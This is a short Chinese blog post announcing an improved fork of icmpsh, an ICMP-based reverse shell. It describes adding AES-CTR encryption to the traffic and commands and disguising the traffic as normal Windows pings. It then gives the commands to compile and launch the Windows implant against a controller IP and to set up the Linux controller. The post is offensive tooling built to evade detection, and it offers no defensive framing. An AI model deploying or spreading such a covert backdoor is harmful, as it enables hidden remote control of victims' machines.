icmpsh改进

原项目

https://github.com/bdamele/icmpsh

改进后项目

https://github.com/1457716957/icmpsh

改进点

1. 通信进行了aes_ctr加密(包括传输内容和下发指令)
2. 伪装了windows下的正常通信

正常通信的流量

发送和返回的数据是一样的

编译与运行

windwos下被控端
    gcc icmpsh-s.c aes.c aes.h lib.h  -O1 -static  -o icmpsh-s.exe
    icmpsh-s.exe -t 192.168.1.111 -d 2000 -s 1024

linux控制端
    gcc icmpsh-m.c lib.h aes.h aes.c -o icmpsh-m
    sysctl -w net.ipv4.icmp_echo_ignore_all=1    关闭linux系统下的icmp自动应答功能(注意:这个是临时生效)
    echo net.ipv4.icmp_echo_ignore_all=1 >> /etc/sysctl.conf && sysctl -p (这个永久生效)
    sudo ./icmpsh-m

posted @ 2022-11-21 21:41 是谁走漏了消息阅读(36) 评论(0) 编辑收藏举报

刷新页面返回顶部

start星

icmpsh改进

icmpsh改进

原项目

改进后项目

改进点

正常通信的流量

编译与运行

公告